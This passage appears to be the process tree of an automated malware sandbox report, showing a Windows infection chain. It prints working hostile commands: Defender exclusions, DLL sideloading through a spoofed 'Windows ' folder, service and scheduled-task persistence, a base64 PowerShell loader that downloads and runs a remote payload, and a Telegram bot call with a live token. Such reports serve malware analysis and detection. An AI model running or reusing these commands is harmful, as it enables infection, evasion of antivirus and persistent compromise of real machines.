                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                  • Runs ping.exe
                                                                                                                                                  PID:2148
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
                                                                                                                                                  12⤵
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  PID:5580
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1FRvylL6VCZp.bat" "
                                                                                                                                                    13⤵
                                                                                                                                                      PID:6036
                                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                                        chcp 65001
                                                                                                                                                        14⤵
                                                                                                                                                          PID:1548
                                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                                          ping -n 10 localhost
                                                                                                                                                          14⤵
                                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                          • Runs ping.exe
                                                                                                                                                          PID:3204
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
                                                                                                                                                          14⤵
                                                                                                                                                            PID:2424
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\torque.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\torque.exe"
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:2936
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\BaddStore.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\BaddStore.exe"
                                                                                                                                      3⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:4620
                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                                        4⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:3328
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Files\._cache_aspnet_regiis.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Files\._cache_aspnet_regiis.exe"
                                                                                                                                          5⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5328
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\app64.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\app64.exe"
                                                                                                                                      3⤵
                                                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                      PID:2268
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\ewrvuh.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\ewrvuh.exe"
                                                                                                                                      3⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:3540
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\reverse.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\reverse.exe"
                                                                                                                                      3⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:5532
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\lummetc.exe"
                                                                                                                                      3⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:5884
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\t.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\t.exe"
                                                                                                                                      3⤵
                                                                                                                                      • Adds Run key to start application
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:1500
                                                                                                                                      • C:\Windows\sysnldcvmr.exe
                                                                                                                                        C:\Windows\sysnldcvmr.exe
                                                                                                                                        4⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:1592
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2164521646.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2164521646.exe
                                                                                                                                          5⤵
                                                                                                                                          • Checks computer location settings
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          PID:2708
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                            6⤵
                                                                                                                                              PID:2452
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                                                                                                                                                7⤵
                                                                                                                                                  PID:5460
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                6⤵
                                                                                                                                                  PID:5380
                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                    schtasks /delete /f /tn "Windows Upgrade Manager"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:5388
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\303059389.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\303059389.exe
                                                                                                                                                  5⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:6032
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1144032267.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1144032267.exe
                                                                                                                                                    6⤵
                                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:5884
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\99424430.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\99424430.exe
                                                                                                                                                  5⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:1076
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\2424925859.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\2424925859.exe
                                                                                                                                                  5⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:5704
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3588619235.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\3588619235.exe
                                                                                                                                                    6⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:4468
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\cc2.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\cc2.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:892
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                4⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3000
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              PID:5860
                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                                                                                4⤵
                                                                                                                                                  PID:4988
                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                                                                                    5⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:844
                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                  cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2096
                                                                                                                                                    • C:\Windows\System32\usvcinsta64.exe
                                                                                                                                                      "C:\Windows\System32\usvcinsta64.exe"
                                                                                                                                                      5⤵
                                                                                                                                                        PID:2768
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:4008
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                                                                                                                                                              7⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:5544
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:5920
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                                                                                                                                                                7⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:3540
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              cmd.exe /c mkdir "\\?\C:\Windows \System32"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:5160
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                cmd.exe /c start "" "C:\Windows \System32\printui.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:1232
                                                                                                                                                                  • C:\Windows \System32\printui.exe
                                                                                                                                                                    "C:\Windows \System32\printui.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                    PID:5996
                                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                      cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
                                                                                                                                                                      8⤵
                                                                                                                                                                        PID:5676
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';"
                                                                                                                                                                          9⤵
                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                          PID:1184
                                                                                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                        cmd.exe /c sc create x149796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x149796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x149796.dat" /f && sc start x149796
                                                                                                                                                                        8⤵
                                                                                                                                                                          PID:840
                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                            sc create x149796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            PID:5952
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            reg add HKLM\SYSTEM\CurrentControlSet\services\x149796\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x149796.dat" /f
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Server Software Component: Terminal Services DLL
                                                                                                                                                                            • Modifies registry key
                                                                                                                                                                            PID:4872
                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                            sc start x149796
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Launches sc.exe
                                                                                                                                                                            PID:2900
                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                          cmd.exe /c start "" "C:\Windows\System32\console_zero.exe"
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:5944
                                                                                                                                                                            • C:\Windows\System32\console_zero.exe
                                                                                                                                                                              "C:\Windows\System32\console_zero.exe"
                                                                                                                                                                              9⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:1236
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                cmd.exe /c schtasks /delete /tn "console_zero" /f
                                                                                                                                                                                10⤵
                                                                                                                                                                                • Indicator Removal: Clear Persistence
                                                                                                                                                                                PID:1568
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  schtasks /delete /tn "console_zero" /f
                                                                                                                                                                                  11⤵
                                                                                                                                                                                    PID:5276
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:2584
                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                      schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
                                                                                                                                                                                      11⤵
                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                      PID:6056
                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                cmd.exe /c timeout /t 10 /nobreak && rmdir /s /q "C:\Windows \"
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:5516
                                                                                                                                                                                  • C:\Windows\system32\timeout.exe
                                                                                                                                                                                    timeout /t 10 /nobreak
                                                                                                                                                                                    9⤵
                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                    PID:4888
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:5244
                                                                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                                                                  timeout /t 10 /nobreak
                                                                                                                                                                                  7⤵
                                                                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                                                                  PID:1744
                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                            cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\Admin\AppData\Local\Temp\Files\pyld64.exe"
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:5200
                                                                                                                                                                              • C:\Windows\system32\timeout.exe
                                                                                                                                                                                timeout /t 10 /nobreak
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                PID:2436
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:4876
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGNvdW50ZXIgPSAwOw0KJHB5bFBhdGggPSAiQzpcVXNlcnNcUHVibGljXHB5bGQuZGxsIjsNCmZvciAoOzspew0KCWlmICgkY291bnRlciAtbGUgMyl7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHBzOi8vZ2l0aHViLmNvbS91bnZkMDEvdW52bWFpbi9yYXcvbWFpbi91bjIvYm90cHJudC5kYXQiLCAkcHlsUGF0aCk7DQoJfQ0KCWVsc2V7DQoJCShOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoImh0dHA6Ly91bnZkd2wuY29tL3VuMi9ib3Rwcm50LmRhdCIsICRweWxQYXRoKTsNCgl9DQoJU3RhcnQtU2xlZXAgLVNlY29uZHMgMjsNCglpZiAoVGVzdC1QYXRoICRweWxQYXRoKXsNCgkJY21kIC9jIG1rZGlyICJcXD9cQzpcV2luZG93cyBcU3lzdGVtMzIiOw0KCQljbWQgL2MgeGNvcHkgL3kgIkM6XFdpbmRvd3NcU3lzdGVtMzJccHJpbnR1aS5leGUiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMiI7DQoJCWNtZCAvYyBtb3ZlIC95ICJDOlxVc2Vyc1xQdWJsaWNccHlsZC5kbGwiICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmRsbCI7DQoJCVN0YXJ0LVNsZWVwIC1TZWNvbmRzIDI7DQoJCVN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICJDOlxXaW5kb3dzIFxTeXN0ZW0zMlxwcmludHVpLmV4ZSI7DQoJCWJyZWFrOw0KCX0NCgllbHNlew0KCQlbTmV0LlNlcnZpY2VQb2ludE1hbmFnZXJdOjpTZWN1cml0eVByb3RvY29sID0gW05ldC5TZWN1cml0eVByb3RvY29sVHlwZV06OlRsczEyOw0KCQlTdGFydC1TbGVlcCAtU2Vjb25kcyAyMDsJDQoJfQ0KCWlmICgkY291bnRlciAtZXEgMTApew0KCQlicmVhazsNCgl9DQoJJGNvdW50ZXIrKzsNCn0=')); Invoke-Expression $decoded;"
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                              PID:5320
                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                "C:\Windows\system32\cmd.exe" /c mkdir "\\?\C:\Windows \System32"
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:4916
                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                  "C:\Windows\system32\cmd.exe" /c xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:4216
                                                                                                                                                                                    • C:\Windows\system32\xcopy.exe
                                                                                                                                                                                      xcopy /y C:\Windows\System32\printui.exe "C:\Windows \System32"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:3852
                                                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c move /y C:\Users\Public\pyld.dll "C:\Windows \System32\printui.dll"
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3564
                                                                                                                                                                                      • C:\Windows \System32\printui.exe
                                                                                                                                                                                        "C:\Windows \System32\printui.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                        PID:5624
                                                                                                                                                                                        • C:\WINDOWS\SYSTEM32\cmd.exe
                                                                                                                                                                                          cmd.exe /c powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                            PID:2824
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell -Command "$dec = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('QWRkLU1wUHJlZmVyZW5jZSAtRXhjbHVzaW9uUGF0aCAiJGVudjpTeXN0ZW1Ecml2ZVxXaW5kb3dzIFxTeXN0ZW0zMiI7DQpBZGQtTXBQcmVmZXJlbmNlIC1FeGNsdXNpb25QYXRoICIkZW52OlN5c3RlbURyaXZlXFdpbmRvd3NcU3lzdGVtMzIiOw==')); Invoke-Expression $dec;"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                              PID:5580
                                                                                                                                                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                            cmd.exe /c start "" "C:\Windows\System32\bav64.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:4320
                                                                                                                                                                                              • C:\Windows\System32\bav64.exe
                                                                                                                                                                                                "C:\Windows\System32\bav64.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • Deletes itself
                                                                                                                                                                                                PID:3536
                                                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                              cmd.exe /c powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@UIJZGLAR: Already exists.'});"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:1692
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7607027553:AAHrudQNbA23c1Me3ecFJGIJnQ0H1nBCp5Y/sendMessage' -Method Post -ContentType 'application/json' -Body (ConvertTo-Json @{chat_id='1536131459'; text='[loader] Admin@UIJZGLAR: Already exists.'});"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                  PID:5736
                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \"
                                                                                                                                                                                                5⤵
                                                                                                                                                                                                  PID:5204
                                                                                                                                                                                                  • C:\Windows\System32\timeout.exe
                                                                                                                                                                                                    timeout /t 14 /nobreak
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                                                    PID:1932
                                                                                                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                  cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows\System32\svcldr64.dat"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                    PID:2760
                                                                                                                                                                                                    • C:\Windows\System32\timeout.exe
                                                                                                                                                                                                      timeout /t 16 /nobreak
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                                                                      PID:5872
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Files\Ewpeloxttug.exe"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:5476
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                              2⤵
                                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                              PID:6092
                                                                                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                                                                                              C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2824
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                PID:1992
                                                                                                                                                                                              • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                C:\Windows\System32\conhost.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:5888
                                                                                                                                                                                                • C:\Windows\System32\dwm.exe
                                                                                                                                                                                                  C:\Windows\System32\dwm.exe
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:5852
                                                                                                                                                                                                • C:\ProgramData\svcsys
                                                                                                                                                                                                  "C:\ProgramData\svcsys"
                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  PID:940
